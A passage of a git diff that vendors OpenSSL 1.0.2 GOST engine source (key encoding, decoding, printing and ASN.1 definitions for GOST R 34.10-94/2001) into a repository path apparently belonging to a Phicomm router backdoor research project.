+    param_nid = OBJ_obj2nid(gkp->key_params);
+    GOST_KEY_PARAMS_free(gkp);
+    EVP_PKEY_set_type(pkey, pkey_nid);
+    switch (pkey_nid) {
+    case NID_id_GostR3410_94:
+        {
+            DSA *dsa = EVP_PKEY_get0(pkey);
+            if (!dsa) {
+                dsa = DSA_new();
+                if (!EVP_PKEY_assign(pkey, pkey_nid, dsa))
+                    return 0;
+            }
+            if (!fill_GOST94_params(dsa, param_nid))
+                return 0;
+            break;
+        }
+    case NID_id_GostR3410_2001:
+        {
+            EC_KEY *ec = EVP_PKEY_get0(pkey);
+            if (!ec) {
+                ec = EC_KEY_new();
+                if (!EVP_PKEY_assign(pkey, pkey_nid, ec))
+                    return 0;
+            }
+            if (!fill_GOST2001_params(ec, param_nid))
+                return 0;
+        }
+    }
+
+    return 1;
+}
+
+static int gost_set_priv_key(EVP_PKEY *pkey, BIGNUM *priv)
+{
+    switch (EVP_PKEY_base_id(pkey)) {
+    case NID_id_GostR3410_94:
+        {
+            DSA *dsa = EVP_PKEY_get0(pkey);
+            if (!dsa) {
+                dsa = DSA_new();
+                EVP_PKEY_assign(pkey, EVP_PKEY_base_id(pkey), dsa);
+            }
+            dsa->priv_key = BN_dup(priv);
+            if (!EVP_PKEY_missing_parameters(pkey))
+                gost94_compute_public(dsa);
+            break;
+        }
+    case NID_id_GostR3410_2001:
+        {
+            EC_KEY *ec = EVP_PKEY_get0(pkey);
+            if (!ec) {
+                ec = EC_KEY_new();
+                EVP_PKEY_assign(pkey, EVP_PKEY_base_id(pkey), ec);
+            }
+            if (!EC_KEY_set_private_key(ec, priv))
+                return 0;
+            if (!EVP_PKEY_missing_parameters(pkey))
+                gost2001_compute_public(ec);
+            break;
+        }
+    }
+    return 1;
+}
+
+BIGNUM *gost_get0_priv_key(const EVP_PKEY *pkey)
+{
+    switch (EVP_PKEY_base_id(pkey)) {
+    case NID_id_GostR3410_94:
+        {
+            DSA *dsa = EVP_PKEY_get0((EVP_PKEY *)pkey);
+            if (!dsa) {
+                return NULL;
+            }
+            if (!dsa->priv_key)
+                return NULL;
+            return dsa->priv_key;
+            break;
+        }
+    case NID_id_GostR3410_2001:
+        {
+            EC_KEY *ec = EVP_PKEY_get0((EVP_PKEY *)pkey);
+            const BIGNUM *priv;
+            if (!ec) {
+                return NULL;
+            }
+            if (!(priv = EC_KEY_get0_private_key(ec)))
+                return NULL;
+            return (BIGNUM *)priv;
+            break;
+        }
+    }
+    return NULL;
+}
+
+static int pkey_ctrl_gost(EVP_PKEY *pkey, int op, long arg1, void *arg2)
+{
+    switch (op) {
+    case ASN1_PKEY_CTRL_PKCS7_SIGN:
+        if (arg1 == 0) {
+            X509_ALGOR *alg1 = NULL, *alg2 = NULL;
+            int nid = EVP_PKEY_base_id(pkey);
+            PKCS7_SIGNER_INFO_get0_algs((PKCS7_SIGNER_INFO *)arg2,
+                                        NULL, &alg1, &alg2);
+            X509_ALGOR_set0(alg1, OBJ_nid2obj(NID_id_GostR3411_94),
+                            V_ASN1_NULL, 0);
+            if (nid == NID_undef) {
+                return (-1);
+            }
+            X509_ALGOR_set0(alg2, OBJ_nid2obj(nid), V_ASN1_NULL, 0);
+        }
+        return 1;
+#ifndef OPENSSL_NO_CMS
+    case ASN1_PKEY_CTRL_CMS_SIGN:
+        if (arg1 == 0) {
+            X509_ALGOR *alg1 = NULL, *alg2 = NULL;
+            int nid = EVP_PKEY_base_id(pkey);
+            CMS_SignerInfo_get0_algs((CMS_SignerInfo *)arg2,
+                                     NULL, NULL, &alg1, &alg2);
+            X509_ALGOR_set0(alg1, OBJ_nid2obj(NID_id_GostR3411_94),
+                            V_ASN1_NULL, 0);
+            if (nid == NID_undef) {
+                return (-1);
+            }
+            X509_ALGOR_set0(alg2, OBJ_nid2obj(nid), V_ASN1_NULL, 0);
+        }
+        return 1;
+#endif
+    case ASN1_PKEY_CTRL_PKCS7_ENCRYPT:
+        if (arg1 == 0) {
+            X509_ALGOR *alg;
+            ASN1_STRING *params = encode_gost_algor_params(pkey);
+            if (!params) {
+                return -1;
+            }
+            PKCS7_RECIP_INFO_get0_alg((PKCS7_RECIP_INFO *)arg2, &alg);
+            X509_ALGOR_set0(alg, OBJ_nid2obj(pkey->type),
+                            V_ASN1_SEQUENCE, params);
+        }
+        return 1;
+#ifndef OPENSSL_NO_CMS
+    case ASN1_PKEY_CTRL_CMS_ENVELOPE:
+        if (arg1 == 0) {
+            X509_ALGOR *alg = NULL;
+            ASN1_STRING *params = encode_gost_algor_params(pkey);
+            if (!params) {
+                return -1;
+            }
+            CMS_RecipientInfo_ktri_get0_algs((CMS_RecipientInfo *)arg2, NULL,
+                                             NULL, &alg);
+            X509_ALGOR_set0(alg, OBJ_nid2obj(pkey->type), V_ASN1_SEQUENCE,
+                            params);
+        }
+        return 1;
+#endif
+    case ASN1_PKEY_CTRL_DEFAULT_MD_NID:
+        *(int *)arg2 = NID_id_GostR3411_94;
+        return 2;
+    }
+
+    return -2;
+}
+
+/* --------------------- free functions * ------------------------------*/
+static void pkey_free_gost94(EVP_PKEY *key)
+{
+    if (key->pkey.dsa) {
+        DSA_free(key->pkey.dsa);
+    }
+}
+
+static void pkey_free_gost01(EVP_PKEY *key)
+{
+    if (key->pkey.ec) {
+        EC_KEY_free(key->pkey.ec);
+    }
+}
+
+/* ------------------ private key functions  -----------------------------*/
+static int priv_decode_gost(EVP_PKEY *pk, PKCS8_PRIV_KEY_INFO *p8inf)
+{
+    const unsigned char *pkey_buf = NULL, *p = NULL;
+    int priv_len = 0;
+    BIGNUM *pk_num = NULL;
+    int ret = 0;
+    X509_ALGOR *palg = NULL;
+    ASN1_OBJECT *palg_obj = NULL;
+    ASN1_INTEGER *priv_key = NULL;
+
+    if (!PKCS8_pkey_get0(&palg_obj, &pkey_buf, &priv_len, &palg, p8inf))
+        return 0;
+    p = pkey_buf;
+    if (!decode_gost_algor_params(pk, palg)) {
+        return 0;
+    }
+    if (V_ASN1_OCTET_STRING == *p) {
+        /* New format - Little endian octet string */
+        unsigned char rev_buf[32];
+        int i;
+        ASN1_OCTET_STRING *s = d2i_ASN1_OCTET_STRING(NULL, &p, priv_len);
+        if (!s || s->length != 32) {
+            GOSTerr(GOST_F_PRIV_DECODE_GOST, EVP_R_DECODE_ERROR);
+            return 0;
+        }
+        for (i = 0; i < 32; i++) {
+            rev_buf[31 - i] = s->data[i];
+        }
+        ASN1_STRING_free(s);
+        pk_num = getbnfrombuf(rev_buf, 32);
+    } else {
+        priv_key = d2i_ASN1_INTEGER(NULL, &p, priv_len);
+        if (!priv_key)
+            return 0;
+        ret = ((pk_num = ASN1_INTEGER_to_BN(priv_key, NULL)) != NULL);
+        ASN1_INTEGER_free(priv_key);
+        if (!ret) {
+            GOSTerr(GOST_F_PRIV_DECODE_GOST, EVP_R_DECODE_ERROR);
+            return 0;
+        }
+    }
+
+    ret = gost_set_priv_key(pk, pk_num);
+    BN_free(pk_num);
+    return ret;
+}
+
+/* ----------------------------------------------------------------------*/
+static int priv_encode_gost(PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pk)
+{
+    ASN1_OBJECT *algobj = OBJ_nid2obj(EVP_PKEY_base_id(pk));
+    ASN1_STRING *params = encode_gost_algor_params(pk);
+    unsigned char *priv_buf = NULL;
+    int priv_len;
+
+    ASN1_INTEGER *asn1key = NULL;
+    if (!params) {
+        return 0;
+    }
+    asn1key = BN_to_ASN1_INTEGER(gost_get0_priv_key(pk), NULL);
+    priv_len = i2d_ASN1_INTEGER(asn1key, &priv_buf);
+    ASN1_INTEGER_free(asn1key);
+    return PKCS8_pkey_set0(p8, algobj, 0, V_ASN1_SEQUENCE, params,
+                           priv_buf, priv_len);
+}
+
+/* --------- printing keys --------------------------------*/
+static int print_gost_94(BIO *out, const EVP_PKEY *pkey, int indent,
+                         ASN1_PCTX *pctx, int type)
+{
+    int param_nid = NID_undef;
+
+    if (type == 2) {
+        BIGNUM *key;
+
+        if (!BIO_indent(out, indent, 128))
+            return 0;
+        BIO_printf(out, "Private key: ");
+        key = gost_get0_priv_key(pkey);
+        if (!key)
+            BIO_printf(out, "<undefined>");
+        else
+            BN_print(out, key);
+        BIO_printf(out, "\n");
+    }
+    if (type >= 1) {
+        BIGNUM *pubkey;
+
+        pubkey = ((DSA *)EVP_PKEY_get0((EVP_PKEY *)pkey))->pub_key;
+        BIO_indent(out, indent, 128);
+        BIO_printf(out, "Public key: ");
+        BN_print(out, pubkey);
+        BIO_printf(out, "\n");
+    }
+
+    param_nid = gost94_nid_by_params(EVP_PKEY_get0((EVP_PKEY *)pkey));
+    BIO_indent(out, indent, 128);
+    BIO_printf(out, "Parameter set: %s\n", OBJ_nid2ln(param_nid));
+    return 1;
+}
+
+static int param_print_gost94(BIO *out, const EVP_PKEY *pkey, int indent,
+                              ASN1_PCTX *pctx)
+{
+    return print_gost_94(out, pkey, indent, pctx, 0);
+}
+
+static int pub_print_gost94(BIO *out, const EVP_PKEY *pkey, int indent,
+                            ASN1_PCTX *pctx)
+{
+    return print_gost_94(out, pkey, indent, pctx, 1);
+}
+
+static int priv_print_gost94(BIO *out, const EVP_PKEY *pkey, int indent,
+                             ASN1_PCTX *pctx)
+{
+    return print_gost_94(out, pkey, indent, pctx, 2);
+}
+
+static int print_gost_01(BIO *out, const EVP_PKEY *pkey, int indent,
+                         ASN1_PCTX *pctx, int type)
+{
+    int param_nid = NID_undef;
+    if (type == 2) {
+        BIGNUM *key;
+
+        if (!BIO_indent(out, indent, 128))
+            return 0;
+        BIO_printf(out, "Private key: ");
+        key = gost_get0_priv_key(pkey);
+        if (!key)
+            BIO_printf(out, "<undefined)");
+        else
+            BN_print(out, key);
+        BIO_printf(out, "\n");
+    }
+    if (type >= 1) {
+        BN_CTX *ctx = BN_CTX_new();
+        BIGNUM *X, *Y;
+        const EC_POINT *pubkey;
+        const EC_GROUP *group;
+
+        if (!ctx) {
+            GOSTerr(GOST_F_PRINT_GOST_01, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        BN_CTX_start(ctx);
+        X = BN_CTX_get(ctx);
+        Y = BN_CTX_get(ctx);
+        pubkey =
+            EC_KEY_get0_public_key((EC_KEY *)EVP_PKEY_get0((EVP_PKEY *)pkey));
+        group = EC_KEY_get0_group((EC_KEY *)EVP_PKEY_get0((EVP_PKEY *)pkey));
+        if (!EC_POINT_get_affine_coordinates_GFp(group, pubkey, X, Y, ctx)) {
+            GOSTerr(GOST_F_PRINT_GOST_01, ERR_R_EC_LIB);
+            BN_CTX_free(ctx);
+            return 0;
+        }
+        if (!BIO_indent(out, indent, 128))
+            return 0;
+        BIO_printf(out, "Public key:\n");
+        if (!BIO_indent(out, indent + 3, 128))
+            return 0;
+        BIO_printf(out, "X:");
+        BN_print(out, X);
+        BIO_printf(out, "\n");
+        BIO_indent(out, indent + 3, 128);
+        BIO_printf(out, "Y:");
+        BN_print(out, Y);
+        BIO_printf(out, "\n");
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+
+    param_nid =
+        EC_GROUP_get_curve_name(EC_KEY_get0_group
+                                (EVP_PKEY_get0((EVP_PKEY *)pkey)));
+    if (!BIO_indent(out, indent, 128))
+        return 0;
+    BIO_printf(out, "Parameter set: %s\n", OBJ_nid2ln(param_nid));
+    return 1;
+}
+
+static int param_print_gost01(BIO *out, const EVP_PKEY *pkey, int indent,
+                              ASN1_PCTX *pctx)
+{
+    return print_gost_01(out, pkey, indent, pctx, 0);
+}
+
+static int pub_print_gost01(BIO *out, const EVP_PKEY *pkey, int indent,
+                            ASN1_PCTX *pctx)
+{
+    return print_gost_01(out, pkey, indent, pctx, 1);
+}
+
+static int priv_print_gost01(BIO *out, const EVP_PKEY *pkey, int indent,
+                             ASN1_PCTX *pctx)
+{
+    return print_gost_01(out, pkey, indent, pctx, 2);
+}
+
+/* ---------------------------------------------------------------------*/
+static int param_missing_gost94(const EVP_PKEY *pk)
+{
+    const DSA *dsa = EVP_PKEY_get0((EVP_PKEY *)pk);
+    if (!dsa)
+        return 1;
+    if (!dsa->q)
+        return 1;
+    return 0;
+}
+
+static int param_missing_gost01(const EVP_PKEY *pk)
+{
+    const EC_KEY *ec = EVP_PKEY_get0((EVP_PKEY *)pk);
+    if (!ec)
+        return 1;
+    if (!EC_KEY_get0_group(ec))
+        return 1;
+    return 0;
+}
+
+static int param_copy_gost94(EVP_PKEY *to, const EVP_PKEY *from)
+{
+    const DSA *dfrom = EVP_PKEY_get0((EVP_PKEY *)from);
+    DSA *dto = EVP_PKEY_get0(to);
+    if (EVP_PKEY_base_id(from) != EVP_PKEY_base_id(to)) {
+        GOSTerr(GOST_F_PARAM_COPY_GOST94, GOST_R_INCOMPATIBLE_ALGORITHMS);
+        return 0;
+    }
+    if (!dfrom) {
+        GOSTerr(GOST_F_PARAM_COPY_GOST94, GOST_R_KEY_PARAMETERS_MISSING);
+        return 0;
+    }
+    if (!dto) {
+        dto = DSA_new();
+        EVP_PKEY_assign(to, EVP_PKEY_base_id(from), dto);
+    }
+#define COPYBIGNUM(a,b,x) if (a->x) BN_free(a->x); a->x=BN_dup(b->x);
+    COPYBIGNUM(dto, dfrom, p)
+        COPYBIGNUM(dto, dfrom, q)
+        COPYBIGNUM(dto, dfrom, g)
+
+        if (dto->priv_key)
+        gost94_compute_public(dto);
+    return 1;
+}
+
+static int param_copy_gost01(EVP_PKEY *to, const EVP_PKEY *from)
+{
+    EC_KEY *eto = EVP_PKEY_get0(to);
+    const EC_KEY *efrom = EVP_PKEY_get0((EVP_PKEY *)from);
+    if (EVP_PKEY_base_id(from) != EVP_PKEY_base_id(to)) {
+        GOSTerr(GOST_F_PARAM_COPY_GOST01, GOST_R_INCOMPATIBLE_ALGORITHMS);
+        return 0;
+    }
+    if (!efrom) {
+        GOSTerr(GOST_F_PARAM_COPY_GOST01, GOST_R_KEY_PARAMETERS_MISSING);
+        return 0;
+    }
+    if (!eto) {
+        eto = EC_KEY_new();
+        EVP_PKEY_assign(to, EVP_PKEY_base_id(from), eto);
+    }
+    EC_KEY_set_group(eto, EC_KEY_get0_group(efrom));
+    if (EC_KEY_get0_private_key(eto)) {
+        gost2001_compute_public(eto);
+    }
+    return 1;
+}
+
+static int param_cmp_gost94(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    const DSA *da = EVP_PKEY_get0((EVP_PKEY *)a);
+    const DSA *db = EVP_PKEY_get0((EVP_PKEY *)b);
+    if (!BN_cmp(da->q, db->q))
+        return 1;
+    return 0;
+}
+
+static int param_cmp_gost01(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (EC_GROUP_get_curve_name
+        (EC_KEY_get0_group(EVP_PKEY_get0((EVP_PKEY *)a))) ==
+        EC_GROUP_get_curve_name(EC_KEY_get0_group
+                                (EVP_PKEY_get0((EVP_PKEY *)b)))) {
+        return 1;
+    }
+    return 0;
+
+}
+
+/* ---------- Public key functions * --------------------------------------*/
+static int pub_decode_gost94(EVP_PKEY *pk, X509_PUBKEY *pub)
+{
+    X509_ALGOR *palg = NULL;
+    const unsigned char *pubkey_buf = NULL;
+    unsigned char *databuf;
+    ASN1_OBJECT *palgobj = NULL;
+    int pub_len, i, j;
+    DSA *dsa;
+    ASN1_OCTET_STRING *octet = NULL;
+
+    if (!X509_PUBKEY_get0_param(&palgobj, &pubkey_buf, &pub_len, &palg, pub))
+        return 0;
+    EVP_PKEY_assign(pk, OBJ_obj2nid(palgobj), NULL);
+    if (!decode_gost_algor_params(pk, palg))
+        return 0;
+    octet = d2i_ASN1_OCTET_STRING(NULL, &pubkey_buf, pub_len);
+    if (!octet) {
+        GOSTerr(GOST_F_PUB_DECODE_GOST94, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    databuf = OPENSSL_malloc(octet->length);
+    for (i = 0, j = octet->length - 1; i < octet->length; i++, j--) {
+        databuf[j] = octet->data[i];
+    }
+    dsa = EVP_PKEY_get0(pk);
+    dsa->pub_key = BN_bin2bn(databuf, octet->length, NULL);
+    ASN1_OCTET_STRING_free(octet);
+    OPENSSL_free(databuf);
+    return 1;
+
+}
+
+static int pub_encode_gost94(X509_PUBKEY *pub, const EVP_PKEY *pk)
+{
+    ASN1_OBJECT *algobj = NULL;
+    ASN1_OCTET_STRING *octet = NULL;
+    void *pval = NULL;
+    unsigned char *buf = NULL, *databuf, *sptr;
+    int i, j, data_len, ret = 0;
+
+    int ptype = V_ASN1_UNDEF;
+    DSA *dsa = EVP_PKEY_get0((EVP_PKEY *)pk);
+    algobj = OBJ_nid2obj(EVP_PKEY_base_id(pk));
+    if (pk->save_parameters) {
+        ASN1_STRING *params = encode_gost_algor_params(pk);
+        pval = params;
+        ptype = V_ASN1_SEQUENCE;
+    }
+    data_len = BN_num_bytes(dsa->pub_key);
+    databuf = OPENSSL_malloc(data_len);
+    BN_bn2bin(dsa->pub_key, databuf);
+    octet = ASN1_OCTET_STRING_new();
+    ASN1_STRING_set(octet, NULL, data_len);
+    sptr = ASN1_STRING_data(octet);
+    for (i = 0, j = data_len - 1; i < data_len; i++, j--) {
+        sptr[i] = databuf[j];
+    }
+    OPENSSL_free(databuf);
+    ret = i2d_ASN1_OCTET_STRING(octet, &buf);
+    ASN1_BIT_STRING_free(octet);
+    if (ret < 0)
+        return 0;
+    return X509_PUBKEY_set0_param(pub, algobj, ptype, pval, buf, ret);
+}
+
+static int pub_decode_gost01(EVP_PKEY *pk, X509_PUBKEY *pub)
+{
+    X509_ALGOR *palg = NULL;
+    const unsigned char *pubkey_buf = NULL;
+    unsigned char *databuf;
+    ASN1_OBJECT *palgobj = NULL;
+    int pub_len, i, j;
+    EC_POINT *pub_key;
+    BIGNUM *X, *Y;
+    ASN1_OCTET_STRING *octet = NULL;
+    int len;
+    const EC_GROUP *group;
+
+    if (!X509_PUBKEY_get0_param(&palgobj, &pubkey_buf, &pub_len, &palg, pub))
+        return 0;
+    EVP_PKEY_assign(pk, OBJ_obj2nid(palgobj), NULL);
+    if (!decode_gost_algor_params(pk, palg))
+        return 0;
+    group = EC_KEY_get0_group(EVP_PKEY_get0(pk));
+    octet = d2i_ASN1_OCTET_STRING(NULL, &pubkey_buf, pub_len);
+    if (!octet) {
+        GOSTerr(GOST_F_PUB_DECODE_GOST01, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    databuf = OPENSSL_malloc(octet->length);
+    for (i = 0, j = octet->length - 1; i < octet->length; i++, j--) {
+        databuf[j] = octet->data[i];
+    }
+    len = octet->length / 2;
+    ASN1_OCTET_STRING_free(octet);
+
+    Y = getbnfrombuf(databuf, len);
+    X = getbnfrombuf(databuf + len, len);
+    OPENSSL_free(databuf);
+    pub_key = EC_POINT_new(group);
+    if (!EC_POINT_set_affine_coordinates_GFp(group, pub_key, X, Y, NULL)) {
+        GOSTerr(GOST_F_PUB_DECODE_GOST01, ERR_R_EC_LIB);
+        EC_POINT_free(pub_key);
+        BN_free(X);
+        BN_free(Y);
+        return 0;
+    }
+    BN_free(X);
+    BN_free(Y);
+    if (!EC_KEY_set_public_key(EVP_PKEY_get0(pk), pub_key)) {
+        GOSTerr(GOST_F_PUB_DECODE_GOST01, ERR_R_EC_LIB);
+        EC_POINT_free(pub_key);
+        return 0;
+    }
+    EC_POINT_free(pub_key);
+    return 1;
+
+}
+
+static int pub_encode_gost01(X509_PUBKEY *pub, const EVP_PKEY *pk)
+{
+    ASN1_OBJECT *algobj = NULL;
+    ASN1_OCTET_STRING *octet = NULL;
+    void *pval = NULL;
+    unsigned char *buf = NULL, *databuf, *sptr;
+    int i, j, data_len, ret = 0;
+    const EC_POINT *pub_key;
+    BIGNUM *X, *Y, *order;
+    const EC_KEY *ec = EVP_PKEY_get0((EVP_PKEY *)pk);
+    int ptype = V_ASN1_UNDEF;
+
+    algobj = OBJ_nid2obj(EVP_PKEY_base_id(pk));
+    if (pk->save_parameters) {
+        ASN1_STRING *params = encode_gost_algor_params(pk);
+        pval = params;
+        ptype = V_ASN1_SEQUENCE;
+    }
+    order = BN_new();
+    EC_GROUP_get_order(EC_KEY_get0_group(ec), order, NULL);
+    pub_key = EC_KEY_get0_public_key(ec);
+    if (!pub_key) {
+        GOSTerr(GOST_F_PUB_ENCODE_GOST01, GOST_R_PUBLIC_KEY_UNDEFINED);
+        return 0;
+    }
+    X = BN_new();
+    Y = BN_new();
+    EC_POINT_get_affine_coordinates_GFp(EC_KEY_get0_group(ec),
+                                        pub_key, X, Y, NULL);
+    data_len = 2 * BN_num_bytes(order);
+    BN_free(order);
+    databuf = OPENSSL_malloc(data_len);
+    memset(databuf, 0, data_len);
+
+    store_bignum(X, databuf + data_len / 2, data_len / 2);
+    store_bignum(Y, databuf, data_len / 2);
+
+    BN_free(X);
+    BN_free(Y);
+    octet = ASN1_OCTET_STRING_new();
+    ASN1_STRING_set(octet, NULL, data_len);
+    sptr = ASN1_STRING_data(octet);
+    for (i = 0, j = data_len - 1; i < data_len; i++, j--) {
+        sptr[i] = databuf[j];
+    }
+    OPENSSL_free(databuf);
+    ret = i2d_ASN1_OCTET_STRING(octet, &buf);
+    ASN1_BIT_STRING_free(octet);
+    if (ret < 0)
+        return 0;
+    return X509_PUBKEY_set0_param(pub, algobj, ptype, pval, buf, ret);
+}
+
+static int pub_cmp_gost94(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    const DSA *da = EVP_PKEY_get0((EVP_PKEY *)a);
+    const DSA *db = EVP_PKEY_get0((EVP_PKEY *)b);
+    if (da && db && da->pub_key && db->pub_key
+        && !BN_cmp(da->pub_key, db->pub_key)) {
+        return 1;
+    }
+    return 0;
+}
+
+static int pub_cmp_gost01(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    const EC_KEY *ea = EVP_PKEY_get0((EVP_PKEY *)a);
+    const EC_KEY *eb = EVP_PKEY_get0((EVP_PKEY *)b);
+    const EC_POINT *ka, *kb;
+    int ret = 0;
+    if (!ea || !eb)
+        return 0;
+    ka = EC_KEY_get0_public_key(ea);
+    kb = EC_KEY_get0_public_key(eb);
+    if (!ka || !kb)
+        return 0;
+    ret = (0 == EC_POINT_cmp(EC_KEY_get0_group(ea), ka, kb, NULL));
+    return ret;
+}
+
+static int pkey_size_gost(const EVP_PKEY *pk)
+{
+    return 64;
+}
+
+static int pkey_bits_gost(const EVP_PKEY *pk)
+{
+    return 256;
+}
+
+/* ---------------------- ASN1 METHOD for GOST MAC  -------------------*/
+static void mackey_free_gost(EVP_PKEY *pk)
+{
+    if (pk->pkey.ptr) {
+        OPENSSL_free(pk->pkey.ptr);
+    }
+}
+
+static int mac_ctrl_gost(EVP_PKEY *pkey, int op, long arg1, void *arg2)
+{
+    switch (op) {
+    case ASN1_PKEY_CTRL_DEFAULT_MD_NID:
+        *(int *)arg2 = NID_id_Gost28147_89_MAC;
+        return 2;
+    }
+    return -2;
+}
+
+static int gost94_param_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    int nid = gost94_nid_by_params(EVP_PKEY_get0((EVP_PKEY *)pkey));
+    return i2d_ASN1_OBJECT(OBJ_nid2obj(nid), pder);
+}
+
+static int gost2001_param_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    int nid =
+        EC_GROUP_get_curve_name(EC_KEY_get0_group
+                                (EVP_PKEY_get0((EVP_PKEY *)pkey)));
+    return i2d_ASN1_OBJECT(OBJ_nid2obj(nid), pder);
+}
+
+static int gost94_param_decode(EVP_PKEY *pkey, const unsigned char **pder,
+                               int derlen)
+{
+    ASN1_OBJECT *obj = NULL;
+    DSA *dsa = EVP_PKEY_get0(pkey);
+    int nid;
+    if (d2i_ASN1_OBJECT(&obj, pder, derlen) == NULL) {
+        return 0;
+    }
+    nid = OBJ_obj2nid(obj);
+    ASN1_OBJECT_free(obj);
+    if (!dsa) {
+        dsa = DSA_new();
+        if (!EVP_PKEY_assign(pkey, NID_id_GostR3410_94, dsa))
+            return 0;
+    }
+    if (!fill_GOST94_params(dsa, nid))
+        return 0;
+    return 1;
+}
+
+static int gost2001_param_decode(EVP_PKEY *pkey, const unsigned char **pder,
+                                 int derlen)
+{
+    ASN1_OBJECT *obj = NULL;
+    int nid;
+    EC_KEY *ec = EVP_PKEY_get0(pkey);
+    if (d2i_ASN1_OBJECT(&obj, pder, derlen) == NULL) {
+        return 0;
+    }
+    nid = OBJ_obj2nid(obj);
+    ASN1_OBJECT_free(obj);
+    if (!ec) {
+        ec = EC_KEY_new();
+        if (!EVP_PKEY_assign(pkey, NID_id_GostR3410_2001, ec))
+            return 0;
+    }
+    if (!fill_GOST2001_params(ec, nid))
+        return 0;
+    return 1;
+}
+
+/* ----------------------------------------------------------------------*/
+int register_ameth_gost(int nid, EVP_PKEY_ASN1_METHOD **ameth,
+                        const char *pemstr, const char *info)
+{
+    *ameth = EVP_PKEY_asn1_new(nid, ASN1_PKEY_SIGPARAM_NULL, pemstr, info);
+    if (!*ameth)
+        return 0;
+    switch (nid) {
+    case NID_id_GostR3410_94:
+        EVP_PKEY_asn1_set_free(*ameth, pkey_free_gost94);
+        EVP_PKEY_asn1_set_private(*ameth,
+                                  priv_decode_gost, priv_encode_gost,
+                                  priv_print_gost94);
+
+        EVP_PKEY_asn1_set_param(*ameth,
+                                gost94_param_decode, gost94_param_encode,
+                                param_missing_gost94, param_copy_gost94,
+                                param_cmp_gost94, param_print_gost94);
+        EVP_PKEY_asn1_set_public(*ameth,
+                                 pub_decode_gost94, pub_encode_gost94,
+                                 pub_cmp_gost94, pub_print_gost94,
+                                 pkey_size_gost, pkey_bits_gost);
+
+        EVP_PKEY_asn1_set_ctrl(*ameth, pkey_ctrl_gost);
+        break;
+    case NID_id_GostR3410_2001:
+        EVP_PKEY_asn1_set_free(*ameth, pkey_free_gost01);
+        EVP_PKEY_asn1_set_private(*ameth,
+                                  priv_decode_gost, priv_encode_gost,
+                                  priv_print_gost01);
+
+        EVP_PKEY_asn1_set_param(*ameth,
+                                gost2001_param_decode, gost2001_param_encode,
+                                param_missing_gost01, param_copy_gost01,
+                                param_cmp_gost01, param_print_gost01);
+        EVP_PKEY_asn1_set_public(*ameth,
+                                 pub_decode_gost01, pub_encode_gost01,
+                                 pub_cmp_gost01, pub_print_gost01,
+                                 pkey_size_gost, pkey_bits_gost);
+
+        EVP_PKEY_asn1_set_ctrl(*ameth, pkey_ctrl_gost);
+        break;
+    case NID_id_Gost28147_89_MAC:
+        EVP_PKEY_asn1_set_free(*ameth, mackey_free_gost);
+        EVP_PKEY_asn1_set_ctrl(*ameth, mac_ctrl_gost);
+        break;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_asn1.c
new file mode 100644
index 0000000..1168633
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_asn1.c
@@ -0,0 +1,56 @@
+/**********************************************************************
+ *                          gost_keytrans.c                           *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *   ASN1 structure definition for GOST key transport                 *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <stdio.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include "gost_lcl.h"
+
+ASN1_NDEF_SEQUENCE(GOST_KEY_TRANSPORT) = {
+        ASN1_SIMPLE(GOST_KEY_TRANSPORT, key_info, GOST_KEY_INFO),
+        ASN1_IMP(GOST_KEY_TRANSPORT, key_agreement_info, GOST_KEY_AGREEMENT_INFO, 0)
+} ASN1_NDEF_SEQUENCE_END(GOST_KEY_TRANSPORT)
+
+IMPLEMENT_ASN1_FUNCTIONS(GOST_KEY_TRANSPORT)
+
+ASN1_NDEF_SEQUENCE(GOST_KEY_INFO) = {
+        ASN1_SIMPLE(GOST_KEY_INFO, encrypted_key, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(GOST_KEY_INFO, imit,          ASN1_OCTET_STRING)
+} ASN1_NDEF_SEQUENCE_END(GOST_KEY_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(GOST_KEY_INFO)
+
+ASN1_NDEF_SEQUENCE(GOST_KEY_AGREEMENT_INFO) = {
+        ASN1_SIMPLE(GOST_KEY_AGREEMENT_INFO, cipher, ASN1_OBJECT),
+        ASN1_IMP_OPT(GOST_KEY_AGREEMENT_INFO, ephem_key, X509_PUBKEY, 0),
+        ASN1_SIMPLE(GOST_KEY_AGREEMENT_INFO, eph_iv, ASN1_OCTET_STRING)
+} ASN1_NDEF_SEQUENCE_END(GOST_KEY_AGREEMENT_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(GOST_KEY_AGREEMENT_INFO)
+
+ASN1_NDEF_SEQUENCE(GOST_KEY_PARAMS) = {
+        ASN1_SIMPLE(GOST_KEY_PARAMS, key_params, ASN1_OBJECT),
+        ASN1_SIMPLE(GOST_KEY_PARAMS, hash_params, ASN1_OBJECT),
+        ASN1_OPT(GOST_KEY_PARAMS, cipher_params, ASN1_OBJECT),
+} ASN1_NDEF_SEQUENCE_END(GOST_KEY_PARAMS)
+
+IMPLEMENT_ASN1_FUNCTIONS(GOST_KEY_PARAMS)
+
+ASN1_NDEF_SEQUENCE(GOST_CIPHER_PARAMS) = {
+        ASN1_SIMPLE(GOST_CIPHER_PARAMS, iv, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(GOST_CIPHER_PARAMS, enc_param_set, ASN1_OBJECT),
+} ASN1_NDEF_SEQUENCE_END(GOST_CIPHER_PARAMS)
+
